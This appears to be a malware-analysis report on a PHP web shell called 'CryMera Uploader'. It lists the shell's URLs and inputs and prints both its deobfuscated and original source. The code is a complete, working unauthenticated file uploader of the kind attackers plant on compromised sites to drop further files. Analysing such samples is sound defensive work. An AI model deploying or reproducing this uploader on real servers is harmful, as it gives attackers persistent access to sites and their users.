PHP Malware Analysis

Back to list

Tags

URLs
https://g.top4top.io/p_1771gvucn0.png
https://g.top4top.io/p_1771gvucn0.png
https://use.fontawesome.com/releases/v5.3.1/css/all.css
https://www.itsteamsec.my.id
https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css
http://anicrack-indo.netii.net/error.css
http://fonts.googleapis.com/css?family=Iceland
Title
./CryMera Uploader
Input
_POST
Environment
getcwd

Deobfuscated code

<?php

echo "<link rel=\"shortcut icon\" href=\"https://g.top4top.io/p_1771gvucn0.png\">";
echo "<center>";
echo "<br><br><br><img height=\"200\" src=\"https://g.top4top.io/p_1771gvucn0.png\"></a>\n";
echo "<title>./CryMera Uploader</title>";
echo "<body style=\"background-color: #272B2E; color: white;\"\nalink=\"#ee0000\" link=\"#0000ee\" vlink=\"#551a8b\">";
echo "<center>";
echo "<br><br>";
echo '<big><span style="color: white;">' . getcwd() . '</span></big><br><br>';
echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\"> \n<input type=\"file\" name=\"mlf\"/>\n<input name=\"upl\" id=\"upl\" type=\"submit\" value=\"upload\" />\n</form>";
if ($_POST['upl'] == "upload") {
    if (@copy($_FILES['mlf']['tmp_name'], $_FILES['mlf']['name'])) {
        echo "<font size=\"2\" color=\"white\">Succes</font>";
    } else {
        echo "<font size=\"2\" color=\"white\">Failed</font>";
    }
}
echo "</body></div><br><br><link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.3.1/css/all.css\"><center>\n<i class=\"fa fa-envelope\"></i>\n<i class=\"fa fa-instagram\"></i>\n<i class=\"fa fa-facebook\"></i>\n<i class=\"fa fa-blog\"></i><br> <br><a href=\"https://www.itsteamsec.my.id\"><font color=\"red\">\n    exit<font color=\"white\"> ()<font color=\"white\">;\n";
?>
<!DOCTYPE html>
<head>
<link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css'/>

<link type="text/css" href="http://anicrack-indo.netii.net/error.css" rel="stylesheet">
<link href="http://fonts.googleapis.com/css?family=Iceland" rel="stylesheet" type="text/css">
</head>
<html>
</body>

</html>


Original code

<?php
 {
echo '<link rel="shortcut icon" href="https://g.top4top.io/p_1771gvucn0.png">';
echo '<center>';
echo '<br><br><br><img height="200" src="https://g.top4top.io/p_1771gvucn0.png"></a>
';


echo '<title>./CryMera Uploader</title>';
echo'<body style="background-color: #272B2E; color: white;"
alink="#ee0000" link="#0000ee" vlink="#551a8b">';
echo '<center>';
echo '<br><br>';

echo '<big><span style="color: white;">'.getcwd().'</span></big><br><br>';

echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader"> 
<input type="file" name="mlf"/>
<input name="upl" id="upl" type="submit" value="upload" />
</form>';
if($_POST['upl'] == "upload")
  if(@copy($_FILES['mlf']['tmp_name'], $_FILES['mlf']['name']))
{echo '<font size="2" color="white">Succes</font>';}
else
{echo '<font size="2" color="white">Failed</font>';}
echo '</body></div><br><br><link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.3.1/css/all.css"><center>
<i class="fa fa-envelope"></i>
<i class="fa fa-instagram"></i>
<i class="fa fa-facebook"></i>
<i class="fa fa-blog"></i><br> <br><a href="https://www.itsteamsec.my.id"><font color="red">
    exit<font color="white"> ()<font color="white">;
';
}
?>
<!DOCTYPE html>
<head>
<link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css'/>

<link type="text/css" href="http://anicrack-indo.netii.net/error.css" rel="stylesheet">
<link href="http://fonts.googleapis.com/css?family=Iceland" rel="stylesheet" type="text/css">
</head>
<html>
</body>

</html>